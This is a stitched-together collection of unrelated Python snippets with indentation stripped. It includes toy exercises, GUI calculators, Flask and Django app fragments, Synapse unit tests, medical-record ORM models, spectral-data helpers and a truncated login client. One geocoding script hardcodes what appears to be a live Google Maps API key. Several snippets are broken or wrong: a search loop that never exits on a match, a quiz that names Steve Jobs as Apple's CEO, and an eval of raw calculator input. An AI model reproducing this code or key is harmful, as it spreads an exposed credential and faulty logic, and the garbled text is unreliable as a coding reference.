eng.setupRoom(bar)
|
if __name__ == '__main__':
n = int(raw_input())
arr = map(int, raw_input().split())
max = max2 = None
for x in arr:
if x == max:
max2 = max2
elif x > max:
max, max2 = x, max
elif x > max2:
max, max2 = max, x
print max2 |
from os import path
from flask.ext.uploads import (UploadSet, configure_uploads, AllExcept, SCRIPTS,
EXECUTABLES)
from flask.ext.wtf import (Form, TextField, TextAreaField, BooleanField,
SelectField, RadioField, PasswordField, FileField,
QuerySelectField,DateField,
Required, Length, Optional, Email, NumberRange,
EqualTo, SubmitField, file_allowed)
from . import models
from . import app
upload_dir = lambda app: path.join(app.instance_path,'upload')
allowed = UploadSet('allowed', AllExcept(SCRIPTS + EXECUTABLES),
default_dest = upload_dir)
configure_uploads(app, (allowed))
def category_query():
return models.Category.query
class Create(Form):
title=TextField('Subject', validators=[Length(3),Required()])
description=TextAreaField('Description', validators=[Length(3),Optional()])
category=QuerySelectField('Category', get_label='name',
query_factory=category_query, validators=[Optional()])
account=TextField('Account', validators=[Length(3),Optional()])
cost=TextField('Cost')
file_upload=FileField('Attachment', validators=[file_allowed(allowed,
"Unsupported File Type")])
class Ticket(Create):
due=DateField('Due Date', validators=[Optional()])
status=TextField('Status')
approved=BooleanField('Approved')
approved_by=TextField('Approved By')
comment=TextAreaField('Comment', validators=[Length(3),Optional()])
priority=SelectField('Priority', choices=[(0,'None'), (1,'Lowest'),
(2,'Low'), (3,'Normal'), (4, 'High'), (5,'URGENT')], coerce=int,
validators=[NumberRange(0,5)])
class Note(Form):
text=TextAreaField('New Note')
class Message(Form):
text=TextAreaField('New Message')
class Category(Form):
name=TextField('New Category')
description=TextAreaField('Description')
frontpage=BooleanField('On Homepage')
submit = SubmitField('Add Category')
class Login(Form):
openid=TextField('OpenID')
class Profile(Form):
name=TextField('Full Name', validators=[Required()])
email=TextField('Email', validators=[Required(),Email()])
student_id=TextField('Student ID', validators=[Required()])
class Upload(Form):
file_upload=FileField('', validators=[file_allowed(allowed,
"Unsupported File Type")])
|
from tkinter import *
from tkinter import messagebox
def CleanJavab(labl):
labl.config(text="")
labl.update()
def Add(labl,txt):
g = labl['text']
labl.config(text=g + txt)
labl.update()
def Remove_a_Number(label):
g = label['text']
resualt = ""
if(len(g) > 0):
for i,j in enumerate(g):
if i == len(g) - 1:
pass
else:
resualt =resualt + j
label.config(text=resualt)
label.update()
def hesab(label):
g = label['text']
g = g.replace("×","*")
g = g.replace("÷","/")
try:
jvab = eval(g)
label.config(text=str(jvab))
except:
label.config(text="")
messagebox.showinfo("خطا",".عبارت نامعتبر است")
label.update()
root = Tk()
root.title("ماشين حساب شخصي");
javab = Label(root,width=50,text="")
btnJam = Button(root,text="+",padx=40,pady=20,command=lambda:Add(javab,"+"))
btnTafrig = Button(root,text="-",padx=40,pady=20,command=lambda:Add(javab,"-"))
btnZarb = Button(root,text="x",padx=40,pady=20,command=lambda:Add(javab,"×"))
btnTagsim = Button(root,text="÷",padx=40,pady=20,command=lambda:Add(javab,"÷"))
btn1 = Button(root,text="1",padx=40,pady=20,command=lambda:Add(javab,"1"))
btn2 = Button(root,text="2",padx=40,pady=20,command=lambda:Add(javab,"2"))
btn3 = Button(root,text="3",padx=40,pady=20,command=lambda:Add(javab,"3"))
btn4 = Button(root,text="4",padx=40,pady=20,command=lambda:Add(javab,"4"))
btn5 = Button(root,text="5",padx=40,pady=20,command=lambda:Add(javab,"5"))
btn6 = Button(root,text="6",padx=40,pady=20,command=lambda:Add(javab,"6"))
btn7 = Button(root,text="7",padx=40,pady=20,command=lambda:Add(javab,"7"))
btn8 = Button(root,text="8",padx=40,pady=20,command=lambda:Add(javab,"8"))
btn9 = Button(root,text="9",padx=40,pady=20,command=lambda:Add(javab,"9"))
btn0 = Button(root,text="0",padx=40,pady=20,command=lambda:Add(javab,"0"))
btnEqual = Button(root,text="=",padx=40,pady=116,command=lambda: hesab(javab))
btnClean = Button(root,text="CL",padx=36,pady=20,command=lambda: CleanJavab(javab))
btnRemove = Button(root,text="R",padx=39.4,pady=20,command=lambda: Remove_a_Number(javab))
btnJam.grid(row=1,column=1)
btnTafrig.grid(row=1,column=2)
btnZarb.grid(row=1,column=3)
btnTagsim.grid(row=1,column=4)
btn1.grid(row=2,column=1)
btn2.grid(row=2,column=2)
btn3.grid(row=2,column=3)
btn4.grid(row=3,column=1)
btn5.grid(row=3,column=2)
btn6.grid(row=3,column=3)
btn7.grid(row=4,column=1)
btn8.grid(row=4,column=2)
btn9.grid(row=4,column=3)
btn0.grid(row=5,column=2)
btnEqual.grid(row=2,rowspan=4,column=4)
javab.grid(row=0,column=0,columnspan=5)
btnClean.grid(row=5,column=1)
btnRemove.grid(row=5,column=3)
mainloop()
|
from view.resources.top_five_view import TopFive
from PyQt5.QtGui import QPixmap
from PyQt5.QtWidgets import QDialog, QHBoxLayout, QLabel, QPushButton, QVBoxLayout, QWidget
class EmployeeGrid(QWidget):
"""QWidget to present the employees tab
"""
def __init__(self, db_controller):
super().__init__()
self.db_controller = db_controller
def employee_grid(self):
"""Returns the QWidget to present the employee tab as a grid layout
"""
grid = QVBoxLayout()
row_one = QHBoxLayout()
row_two = QHBoxLayout()
QLabels = self.__fill_grid()
pixmap = QPixmap('view/img/avatar.png')
pixmap_girl = QPixmap('view/img/avatar_girl.png')
# Set the employee text to the right of an image
label = QLabel()
label.setPixmap(pixmap)
label.setMaximumSize(pixmap.width(), pixmap.height())
row_one.addWidget(label)
row_one.addWidget(QLabels[0])
label = QLabel()
label.setPixmap(pixmap_girl)
label.setMaximumSize(pixmap_girl.width(), pixmap_girl.height())
row_one.addWidget(label)
row_one.addWidget(QLabels[1])
label = QLabel()
label.setPixmap(pixmap_girl)
label.setMaximumSize(pixmap_girl.width(), pixmap_girl.height())
row_two.addWidget(label)
row_two.addWidget(QLabels[2])
label = QLabel()
label.setPixmap(pixmap_girl)
label.setMaximumSize(pixmap_girl.width(), pixmap_girl.height())
row_two.addWidget(label)
row_two.addWidget(QLabels[3])
top_five_btn = QPushButton("Top 5 sales")
top_five_btn.pressed.connect(self.top_five)
top_five_btn.setMaximumWidth(100)
grid.addLayout(row_one)
grid.addLayout(row_two)
grid.addWidget(top_five_btn)
self.setLayout(grid)
return self
def __fill_grid(self):
"""Gets the inforamtion from the employee table and the employe_sales table need to present each employee
in the grid layout
"""
QLabels = []
emp_info = ""
data = self.db_controller.employee_info()
for row in range(len(data)):
count = self.db_controller.employees_company_count(data[row][0])
role = "Manager" if data[row][2] == None else "Sales"
emp_info = f"Name: {data[row][1]}\nRole: {role}\nApp-code's sold: {data[row][3]}\nCompanies: {count}"
label = QLabel(emp_info)
label.setStyleSheet("""
color: rgb(54, 54, 54);
font-family: Arial, Helvetica, sans-serif;
font-size: 15px;
""")
QLabels.append(label)
return QLabels
def top_five(self):
"""Open the QWidget that presents the user with the top five list of sales
"""
self.w = TopFive(self.db_controller)
self.w.show()
|
# for i in range(1,10):
# if (i<4) :
# print(i)
# elif (i>7) :
# print("우리집강아지")
# else :
# print("복슬강아지")
# a = 1
# while a <= 10:
# if a % 2 == 0 :
# print(a)
# a = a + 1
# print("sum =", "sum")
# a=10
# while True :
# print(a)
# a = a + 1
# if a > 10 :
# break;
# a = 0
# cnt = 0
# while a < 10 :
# a += 1
# if (a % 3 == 0) :
# cnt += 1
# continue;
# print(a, end=" ")
# print()
# print("3의 배수의 개수 :",cnt)
# k = int(input("!값 = "))
# m = 1
# print(k, "! = ", end = "", sep="")
# while k > 1 :
# m = m * k
# print(k,"*",end="", sep="")
# k -= 1
# print("1 =", m)
customer = "홍길동"
na = 0
cnt = 0
while na != customer :
print("{}님 주문하신 커피가 준비되었습니다.".format(customer))
na = input("당신의 이름은?")
cnt += 1
if cnt == 5 :
break;
print("안해 ^^ㅣ발")
|
# -*- coding:utf-8 -*-
r"""Identify objects
This module provides a object to represent all Senators and Federal Deputies elected in previously elections, with his
unique identifiers based on a .csv file located in IDENTITY_FILE location.
This module also provide a way to update the content of the IDENTITY_FILE, in the purpose of this usage a copy is made
located in IDENTITY_FILE_UPDATED location.
"""
import csv
from dateutil.parser import parse
from .deputy import Deputy
from .senator import Senator
__author__ = 'Rebeca Bordini <bordini.rebeca@gmail.com>'
IDENTITY_FILE = './initial-data/identity.csv'
IDENTITY_FILE_UPDATED = './generated-data/identity_final.csv'
class Identity:
def __init__(self):
"""
Add all candidates of previous elections present in IDENTITY_FILE
"""
self.deputies = []
self.senators = []
with open(IDENTITY_FILE, 'rt') as csvfile:
spamreader = csv.DictReader(csvfile, delimiter=';')
for row in spamreader:
# Senators and deputies has different contracts
if row.get('cam:ideCadastro'):
self.add_deputy(Deputy(row))
if row.get('sen:CodigoParlamentar'):
self.add_senator(Senator(row))
def add_deputy(self, deputy):
"""
Adds a deputy to deputies_list
:param deputy:
"""
self.deputies.append(deputy)
def add_senator(self, senator):
"""
Adds a senator to senator_list
:param senator:
"""
self.senators.append(senator)
def find(self, name):
"""
Look for a congressman based on his name
:param name:
:return:
"""
congressman_list = self.deputies + self.senators
for congressman in congressman_list:
if congressman.name == name:
return congressman
return None
def get_all_deputies(self):
"""
:return: all deputies
"""
return self.deputies
def get_all_senators(self):
"""
:return: all senators
"""
return self.senators
def update_data(self, uri, data):
"""
Update the content of the IDENTITY_FILE, in the purpose of this usage a copy is made
located in IDENTITY_FILE_UPDATED and the new data is appended. Is not necessary save the file. One row is writed
per function call.
:param uri: The unique identifier of the current congressman
:param data: Elected instance
"""
with open(IDENTITY_FILE_UPDATED, 'a') as csvfile:
spamwriter = csv.writer(csvfile, delimiter=';')
formated_birth_date = parse(data.birth_date)
spamwriter.writerow([uri, '', formated_birth_date.strftime('%Y-%m-%d'), '', data.name, '', '', '', ''])
|
# coding: utf-8
# comeca com consoante
# raquel ambrozio
palavra = ""
palavras = []
comeca_consoantes = 0
while palavra != "***":
palavra = raw_input()
if palavra[0] not in "AaEeIiOoUu*":
comeca_consoantes += 1
print "Palavras: %d" % comeca_consoantes
|
N = int(input())
S = input()
T = 'b'
i = 0
len_T = 1
while len_T < N:
i += 1
r = i % 3
if r == 1:
T = 'a' + T + 'c'
elif r == 2:
T = 'c' + T + 'a'
else:
T = 'b' + T + 'b'
len_T += 2
if len_T != N or S != T:
print(-1)
else:
print(i)
|
########################################
### IMPORT MODULES ###
########################################
import pandas as pd
import googlemaps
gmaps = googlemaps.Client(key='AIzaSyAj5JExaDTeWni5CWXLr8AK4j6Bh8EJDAk')
########################################
### LOOP THROUGH BOROUGHS ###
########################################
london_boroughs = ['Barking and Dagenham',
'Barnet',
'Bexley',
'Brent',
'Bromley',
'Camden',
'City of London',
'Croydon',
'Ealing',
'Enfield',
'Greenwich',
'Hackney',
'Hammersmith and Fulham',
'Haringey',
'Harrow',
'Havering',
'Hillingdon',
'Hounslow',
'Islington',
'Kensington and Chelsea',
'Kingston upon Thames',
'Lambeth',
'Lewisham',
'Merton',
'Newham',
'Redbridge',
'Richmond upon Thames',
'Southwark',
'Sutton',
'Tower Hamlets',
'Waltham Forest',
'Wandsworth',
'Westminster']
borough_coordinates = dict()
for location in london_boroughs:
geocode_result = gmaps.geocode(location + 'Borough of London, London, United Kingdom')
lat = geocode_result[0].get('geometry').get(
'location'
).get(
'lat'
)
lng = geocode_result[0].get('geometry').get(
'location'
).get(
'lng'
)
borough_coordinates[location] = (lat, lng)
df = pd.DataFrame.from_dict(borough_coordinates, orient='index')
df.reset_index(level=0, inplace=True)
df.columns = ['Borough','Latitude','Longitude']
########################################
### STORE DATA ###
########################################
df.to_csv('dataset/borough_coordinates.csv', sep=',', encoding='utf-8', index=False)
|
print 'What do you get when you cross a snowman with a vampire?'
raw_input()
print 'Frostbite!'
raw_input()
print 'What do desntists call an astronaut\'s cavity?'
raw_input()
print 'A black hole!'
raw_input()
print 'Knock knock'
raw_input()
print 'Who\'s there?'
raw_input()
print 'Interrupting cow'
raw_input()
print 'Interrupting cow wh',
print 'MOO!' |
from base import Pedsnet_base, Pcornet_base
from sqlalchemy import Column, Integer, String, Numeric, Date, TIMESTAMP, Float
class DeathPedsnet(Pedsnet_base):
__tablename__ = 'death'
# placeholder schema until actual schema known
__table_args__ = {'schema': 'pedsnet_schema'}
cause_concept_id = Column(Integer)
cause_source_concept_id = Column(Integer)
cause_source_value = Column(String(256))
death_date = Column(Date, nullable=False)
death_datetime = Column(TIMESTAMP(False), nullable=False)
death_impute_concept_id = Column(Integer, nullable=False)
death_type_concept_id = Column(Integer, nullable=False)
death_age_in_months = Column(Float(Precision=64))
cause_concept_name = Column(String(512))
cause_source_concept_name = Column(String(512))
death_impute_concept_name = Column(String(512))
death_type_concept_name = Column(String(512))
site = Column(String(32))
death_cause_id = Column(Integer, primary_key=True, nullable=False)
site_id = Column(Integer)
person_id = Column(Integer, nullable=False)
def __init__(self, cause_concept_id, cause_source_concept_id, cause_source_value,
death_date, death_datetime, death_impute_concept_id, death_type_concept_id,
death_age_in_months, cause_concept_name, cause_source_concept_name,
death_impute_concept_name, death_type_concept_name, site, death_cause_id,
site_id, person_id):
self.cause_concept_id = cause_concept_id
self.cause_source_concept_id = cause_source_concept_id
self.cause_source_value = cause_source_value
self.death_date = death_date
self.death_datetime = death_datetime
self.death_impute_concept_id = death_impute_concept_id
self.death_type_concept_id = death_type_concept_id
self.death_age_in_months = death_age_in_months
self.cause_concept_name = cause_concept_name
self.cause_source_concept_name = cause_source_concept_name
self.death_impute_concept_name = death_impute_concept_name
self.death_type_concept_name = death_type_concept_name
self.site = site
self.death_cause_id = death_cause_id
self.site_id = site_id
self.person_id = person_id
def __repr__(self):
return "Death Id - '%s': " \
"\n\tPerson Id: '%s'" \
"\n\tDeath Date: '%s'" \
"\n\tDeath Age: '%s'" \
"\n\tCause: '%s'" \
"\n\tSite: '%s'" \
% \
(self.death_cause_id, self.person_id, self.death_datetime,
self.death_age_in_months, self.cause_concept_name, self.site)
class DeathPcornet(Pcornet_base):
__tablename__ = 'death'
# placeholder schema until actual schema known
__table_args__ = {'schema': 'pcornet_schema'}
death_date = Column(Date)
death_date_impute = Column(String(2))
death_match_confidence = Column(String(2))
death_source = Column(String(2), nullable=False)
patid = Column(String(256), primary_key=True, nullable=False)
site = Column(String(32), nullable=False)
def __init__(self, death_date, death_date_impute, death_match_confidence,
death_source, patid, site):
self.death_date = death_date
self.death_date_impute = death_date_impute
self.death_match_confidence = death_match_confidence
self.death_source = death_source
self.patid = patid
self.site = site
def __repr__(self):
return "Person - '%s': " \
"\n\tDeath date: '%s'" \
"\n\tSource: '%s'" \
"\n\tSite: '%s'" \
% \
(self.patid, self.death_date, self.death_source, self.site)
class DeathCause(Pcornet_base):
__tablename__ = 'death_cause'
# placeholder schema until actual schema known
__table_args__ = {'schema': 'pcornet_schema'}
death_cause = Column(String(8), primary_key=True, nullable=False)
death_cause_code = Column(String(2), primary_key=True, nullable=False)
death_cause_confidence = Column(String(2))
death_cause_source = Column(String(2), primary_key=True, nullable=False)
death_cause_type = Column(String(2), primary_key=True, nullable=False)
patid = Column(String(256), primary_key=True, nullable=False)
site = Column(String(32), nullable=False)
def __init__(self, death_cause, death_cause_code, death_cause_confidence,
death_cause_source, death_cause_type, patid, site):
self.death_cause = death_cause
self.death_cause_code = death_cause_code
self.death_cause_confidence = death_cause_confidence
self.death_cause_source = death_cause_source
self.death_cause_type = death_cause_type
self.patid = patid
self.site = site
def __repr__(self):
return "Person - '%s': " \
"\n\tDeath Cause: '%s'" \
"\n\tCause Code: '%s'" \
"\n\tCause Source: '%s'" \
"\n\tCause Type: '%s'" \
"\n\tSite: '%s'" \
% \
(self.patid, self.death_cause, self.death_cause_code,
self.death_cause_source, self.death_cause_type, self.site)
|
# -*- coding: utf-8 -*-
# Copyright 2014-2016 OpenMarket Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from tests import unittest
from twisted.internet import defer
from mock import Mock
from synapse.handlers.directory import DirectoryHandler
from synapse.types import RoomAlias
from tests.utils import setup_test_homeserver
class DirectoryHandlers(object):
def __init__(self, hs):
self.directory_handler = DirectoryHandler(hs)
class DirectoryTestCase(unittest.TestCase):
""" Tests the directory service. """
@defer.inlineCallbacks
def setUp(self):
self.mock_federation = Mock(spec=[
"make_query",
"register_edu_handler",
])
self.query_handlers = {}
def register_query_handler(query_type, handler):
self.query_handlers[query_type] = handler
self.mock_federation.register_query_handler = register_query_handler
hs = yield setup_test_homeserver(
http_client=None,
resource_for_federation=Mock(),
replication_layer=self.mock_federation,
)
hs.handlers = DirectoryHandlers(hs)
self.handler = hs.get_handlers().directory_handler
self.store = hs.get_datastore()
self.my_room = RoomAlias.from_string("#my-room:test")
self.your_room = RoomAlias.from_string("#your-room:test")
self.remote_room = RoomAlias.from_string("#another:remote")
@defer.inlineCallbacks
def test_get_local_association(self):
yield self.store.create_room_alias_association(
self.my_room, "!8765qwer:test", ["test"]
)
result = yield self.handler.get_association(self.my_room)
self.assertEquals({
"room_id": "!8765qwer:test",
"servers": ["test"],
}, result)
@defer.inlineCallbacks
def test_get_remote_association(self):
self.mock_federation.make_query.return_value = defer.succeed(
{"room_id": "!8765qwer:test", "servers": ["test", "remote"]}
)
result = yield self.handler.get_association(self.remote_room)
self.assertEquals({
"room_id": "!8765qwer:test",
"servers": ["test", "remote"],
}, result)
self.mock_federation.make_query.assert_called_with(
destination="remote",
query_type="directory",
args={
"room_alias": "#another:remote",
},
retry_on_dns_fail=False,
ignore_backoff=True,
)
@defer.inlineCallbacks
def test_incoming_fed_query(self):
yield self.store.create_room_alias_association(
self.your_room, "!8765asdf:test", ["test"]
)
response = yield self.query_handlers["directory"](
{"room_alias": "#your-room:test"}
)
self.assertEquals({
"room_id": "!8765asdf:test",
"servers": ["test"],
}, response)
|
# -*- coding: utf-8 -*-
__author__ = "radek.augustyn@email.cz"
if __name__ == "__main__":
import sharedtools.log as log
log.createLogger("Deploy")
import argparse
from updatemode import UPDATE_MODE
from config import Config
from directoryprocessor import DirectoryProcessor
parser = argparse.ArgumentParser(description='Deploy python project.')
parser.add_argument("--inputDir", type=str, help="Input directory with source project.", default="C:/ms4w/Apache/htdocs/Generalizace/m3")
parser.add_argument("--outputDir", type=str, help="Output directory.", default="c:/temp/built")
args = parser.parse_args()
log.logger.info("Python Deploy Builder")
processor = DirectoryProcessor(args.inputDir, args.outputDir, Config())
processor.mode = UPDATE_MODE.OVERWRITE
processor.deploy()
processor.printStatistics() |
import numpy as np
import operator
def itemgettergeneral(keys,listdict, cast_to_np_array=False):
"""itemgettergeneral accept a single key or a iterable? and extract
from list of dict listdict.
Due to numpy ufunc limitatation (Cannot construct a ufunc with more
than 32 operands) we switch from np,vectorize to list(map(x)).
Parameters
----------
keys : single key or a iterable? (list only?)
listdict : list of dict
cast_to_np_array : bool cast the output to np.array
Returns
-------
numpy array : each dimension correspond to the key in input keys.
"""
import numpy as np
import operator
if isinstance(keys,list):
outdata = list(map(operator.itemgetter(*keys),listdict))
else:
outdata = list(map(operator.itemgetter(keys),listdict))
if cast_to_np_array:
return np.array(outdata)
else:
return outdata
class Wavelenght:
"""Class to handle wavelenght structure, with useful self.nearest_index method
"""
def __init__(self,name, start_wav,end_wav,resolution):
self.name = name
self.wavelenghts = np.arange(start_wav,end_wav,resolution)
self.start_wav= start_wav
self.end_wav=end_wav
self.resolution = resolution
def __str__(self):
return f'Wavelenght(name="{self.name}",start={self.start_wav},end={self.end_wav},res={self.resolution})'
def nearest_index(self,value,verbose=False):
if (value < self.start_wav) or (value > self.end_wav):
raise ValueError(f'{value} is outside Wavelenght range [{self.start_wav},{self.end_wav}]')
closest=(np.abs(self.wavelenghts - value)).argmin()
if verbose:
print(f'closest point to Wavelenght(start={self.start_wav},end={self.end_wav},res={self.resolution})')
return closest
# dictextractor = lambda keys,dic : dict(zip(keys,itemgetter(*keys)(dic)))
#%timeit 29.7 µs ± 8.93 µs per loop (mean ± std. dev. of 7 runs, 10000 loops each)
dictextractor = lambda keys,dic : {k:dic[k] for k in keys}
#%timeit 29.2 µs ± 6.36 µs per loop (mean ± std. dev. of 7 runs, 10000 loops each)
# python defintion of DATA_QUALITY_INDEX field
DATA_QUALITY_INDEX = [
('Dark Scan',{
'0' : 'shutter not engaged',
'1:' : 'shutter engaged'}),
('Temperature 1',{
'0' : 'Temperature does not exceed 15 deg C threshold.',
'1' : 'Temperature exceeds 15 deg C threshold but less than 25 deg C threshold.',
'2' : 'Temperature exceeds 25 deg C threshold but less than 40 deg C threshold.',
'3' : 'Temperature exceeds 40 deg C threshold.'}),
('Temperature 2',{
'0' : 'Temperature does not exceed 15 deg C threshold.',
'1' : 'Temperature exceeds 15 deg C threshold but less than 25 deg C threshold.',
'2' : 'Temperature exceeds 25 deg C threshold but less than 40 deg C threshold.',
'3' : 'Temperature exceeds 40 deg C threshold.'}),
('Grating Temperature',{
'0' : 'Temperature does not exceed 15 deg C threshold.',
'1' : 'Temperature exceeds 15 deg C threshold but less than 25 deg C threshold.',
'2' : 'Temperature exceeds 25 deg C threshold but less than 40 deg C threshold.',
'3' : 'Temperature exceeds 40 deg C threshold.'}),
('Anomalous Pixels',{
'0' : 0,
'1' : 1,
'2' : 2,
'3' : 3,
'4' : 4,
'5' : 5,
'6' : 6,
'7' : 7,
'8' : 8,
'9' : 9}),
('Partial Data',{
'0' : 'No partial data.',
'1' : 'Partial data exists.'}),
('Saturation',{
'0' : 'No pixels saturated.',
'1' : 'Saturated pixels exist.'}),
('Low Signal Level',{
'0' : 'Signal level not below -32768 threshold.',
'1' : 'Signal level below -32768 threshold.'}),
('Low VIS Wavelength Uncertainty',{
'0' : 'Uncertainty not above TBD threshold at low wavelengths.',
'1' : 'Uncertainty above TBD threshold at low wavelengths.'}),
('High VIS Wavelength Uncertainty',{
'0' : 'Uncertainty not above TBD threshold at high wavelengths.',
'1' : 'Uncertainty above TBD threshold at high wavelengths.'}),
('UVVS Operating',{
'0' : 'UVVS is not scanning during readout.',
'1' : 'UVVS is scanning during readout.'}),
('UVVS Noise Spike',{
'0' : 'No noise spike detected.',
'1' : 'Noise spike detected.'}),
('SPICE Version Epoch',{
'0' : 'No SPICE',
'1' : 'Predict',
'2' : 'Actual'}),
('Dark Saturation',{
'0' : 'All pixels in data record contain at least four unsaturated dark frames.',
'1' : 'One or more pixels in data record contain three or fewer unsaturated dark frames.'}),
('SpareO',{ '0' : 'None'}),
('SpareP',{ '0' : 'None'})
]
def extract_data_quality_index(dqi):
extract = lambda d: [i for i in d if i != '-']
return dict(zip(
[k.replace(" ", "_") for k,v in DATA_QUALITY_INDEX],
[int(k) for k in extract(dqi['DATA_QUALITY_INDEX'])]
)
)
def np_to_sql_arr(x):
"""return a tuple from iterable input x, with el >= 1.0e32 set as None"""
return tuple(el.astype(float) if not el >= 1.0e32 else None for el in x)
# add to the table_data
def extract_regridded_sp(sp,wav_grid):
import scipy.interpolate
wav = sp['CHANNEL_WAVELENGTHS']
iof_sp = sp['IOF_SPECTRUM_DATA']
photom_iof_sp = sp['PHOTOM_IOF_SPECTRUM_DATA']
interpolator = scipy.interpolate.interp1d(wav, photom_iof_sp, kind='linear', fill_value='extrapolate')
photom_iof_sp_2nm = interpolator(wav_grid)
interpolator = scipy.interpolate.interp1d(wav, iof_sp, kind='linear', fill_value='extrapolate')
iof_sp_2nm = interpolator(wav_grid)
return {'photom_iof_sp_2nm': np_to_sql_arr(photom_iof_sp_2nm),
'iof_sp_2nm' : np_to_sql_arr(iof_sp_2nm)}
def fov_coord_extractor(sp,
shapelyze=True,
geoalchemy2ize=True,
srid=4326,
coordinates_names = None):
if not coordinates_names:
coordinates_names = ['TARGET_LONGITUDE_SET','TARGET_LATITUDE_SET']
coord = np.array([l for l in operator.itemgetter(*coordinates_names)(sp)],dtype=np.float32)
# If there is a NaN in the coord, return none.
# It is not possible to use it!!
if ( coord >= 1.0e+32).any() or np.isnan(coord).any() :
return None
else:
coord_tuples = np.array([(i,j) for i,j in zip(*coord)])
coord_dict = {'center': coord_tuples[0]}
coord_dict['fov'] = coord_tuples[[1,3,2,4,1],:]
if shapelyze:
import shapely.geometry
coord_dict['center'] = 'SRID={};{}'.format(srid,shapely.geometry.Point(*coord_dict['center']).wkt)
coord_dict['fov'] = 'SRID={};{}'.format(srid,shapely.geometry.Polygon(coord_dict['fov']).wkt)
if geoalchemy2ize:
from geoalchemy2 import shape
coord_dict['center'] = shape.from_shape(coord_dict['center'],srid=srid)
coord_dict['fov'] = shape.from_shape(coord_dict['fov'],srid=srid)
return coord_dict |
"""
logic operation
and, or, not
T: True
F: False
T and T = T
T and F = F
F and T = F
F and F = F
T or T = T
T or F = T
F or T = T
F or F = F
not T = F
not F = T
"""
def logic_and(a,b):
return a and b
def logic_or(a, b):
return a or b
def logic_not(a):
return not a
|
import random
myList=['aa', 'bb', 'cc', 'dd', 'ee', 'ff', 'gg', 'hh', 'ii', 'jj', 'kk', 'll']
print 'This is my list= ', myList
print
randomIndex=random.randint(0, len(myList)-1)
print 'this is my random index= ', randomIndex
currentIndex=randomIndex
while True:
if randomIndex in range(0,len(myList)):
currentIndex=randomIndex
print 'this is my element in array= ',myList[currentIndex]
print
answer=raw_input('Press n for next, p for previous, or q to quit= ')
answer=str(answer)
if answer=='n' and currentIndex >= 0:
nextIndex=currentIndex+1
randomIndex=nextIndex
print 'this is next element= ', myList[nextIndex], 'and index number= ', nextIndex
print
elif answer=='p' and currentIndex < len(myList)-1:
prevIndex=currentIndex-1
randomIndex=prevIndex
print 'this is previous element= ', myList[prevIndex], 'and previous number= ', prevIndex
print
elif answer=='q':
break
else:
print 'You havent choice right option, please re-enter again'
print
continue
|
from django.contrib import admin
# Register your models here.
from porters.models import Porter
class PorterAdmin(admin.ModelAdmin):
pass
admin.site.register(Porter, PorterAdmin)
|
import time
score = 0
name = str(input("What's your name? "))
print("Welcome, " + name + " to the quiz!\n")
def score_plus():
global score
score += 1
print("Your score: ", score)
def score_minus():
global score
score -= 1
print("Your score: ", score)
def q1():
print("\n1. What is El Capitan?")
time.sleep(1)
print("a) An operating system for Windows")
print("b) An operating system for MAC")
print("c) A third-party application\n")
answer = str(input("What's the right answer: "))
if answer == "b":
print("Well Done, that's correct!")
score_plus()
else:
print("Sorry, that was the wrong answer!")
score_minus()
print()
q2()
def q2():
print("\n2. What is apple's latest device?")
time.sleep(1)
print("a) iPhone")
print("b) MacBook Pro")
print("c) iPod Touch\n")
answer = str(input("What's the right answer: "))
if answer == "b":
print("Well Done, that's correct!")
score_plus()
else:
print("Sorry, that was the wrong answer!")
score_minus()
print()
q3()
def q3():
print("\n3. Who is the CEO of Apple?")
time.sleep(1)
print("a) Anamitra Dey")
print("b) Bill Gates")
print("c) Steve Jobs\n")
answer = str(input("What's the right answer: "))
if answer == "c":
print("Well Done, that's correct!")
score_plus()
else:
print("Sorry, that was the wrong answer!")
score_minus()
q1()
print("\nThank you for participating in the quiz!")
|
from django.conf.urls import url
from . import views
app_name = 'chat'
urlpatterns = [
url(r'^$', views.index, name='index'),
url(r'^about/', views.AboutView.as_view(), name='about'),
url(r'^pusher_auth/', views.pusher_auth, name='pusher_auth'),
url(r'^find_users/$', views.find_users, name='find_users'),
url(r'^get_conversations/$', views.get_conversations, name='get_conversations'),
url(r'^get_messages/$', views.get_messages, name='get_messages'),
url(r'^login/$', views.LoginView.as_view(), name='login'),
url(r'^logout/$', views.logout, name='logout'),
url(r'^post_message/$', views.post_message, name='post_message'),
]
|
'''
Sequential Search
**Computational complexity**:
- best case = 1
- Worst Case = n
- Average Case = n/2
**Advantages**:
- Simple
- small data
**Disadvantages**:
- high computational complex
- big data is slow
- inefficient
'''
def busca_sequencial_for(lista, valor_procurado):
for i in range(len(lista)):
if lista[i] == valor_procurado:
return True;
return False
def busca_sequencial_while(lista, valor_procurado):
indice = 0
found = False
while indice < len(lista):
if lista[indice] == valor_procurado:
found == True
else:
indice += 1
return found
# test
lista = [1, 2, 32, 8, 17, 19, 42, 13, 0]
print(busca_sequencial_for(lista, 13))
print(busca_sequencial_while(lista, 3))
# love python
print("\nlove python")
print(42 in lista)
|
import tkinter as tk
import tkinter.messagebox as messagebox
from tkinter import StringVar
from jiami import *
from test import Post, test_token
import os
app = tk.Tk()
app.title('到梦空间')
app.geometry('1060x800')
tk.Label(app, text='User name:', font=('Arial', 14)).place(x=10, y=0)
tk.Label(app, text='Password:', font=('Arial', 14)).place(x=10, y=35)
entry_usr_name = tk.Entry(app, font=('Arial', 14))
entry_usr_name.place(x=120, y=0)
entry_usr_pwd = tk.Entry(app, font=('Arial', 14), show="*")
entry_usr_pwd.place(x=120, y=35)
tk.Label(app, text='输入查询id', font=('Arial', 14)).place(x=500, y=0)
tk.Label(app, text='输入报名id', font=('Arial', 14)).place(x=500, y=35)
tk.Label(app, text='输入退出id', font=('Arial', 14)).place(x=500, y=70)
id1 = tk.Entry(app, font=('Arial', 14), width=7)
id1.place(x=620, y=0)
id2 = tk.Entry(app, font=('Arial', 14), width=7)
id2.place(x=620, y=35)
id3 = tk.Entry(app, font=('Arial', 14), width=7)
id3.place(x=620, y=70)
class Main(Post):
def read(self):
with open('a.ini', 'r', encoding='utf-8') as f:
self.token = f.readline().rstrip()
self.name = f.readline().rstrip()
self.uid = f.readline().rstrip()
def login(self):
acc = entry_usr_name.get()
pwd = entry_usr_pwd.get()
if os.path.exists('a.ini'):
if test_token():
return True
else:
messagebox.showwarning(title='出错了', message='登录失效,请重新登录')
os.remove('a.ini')
return False
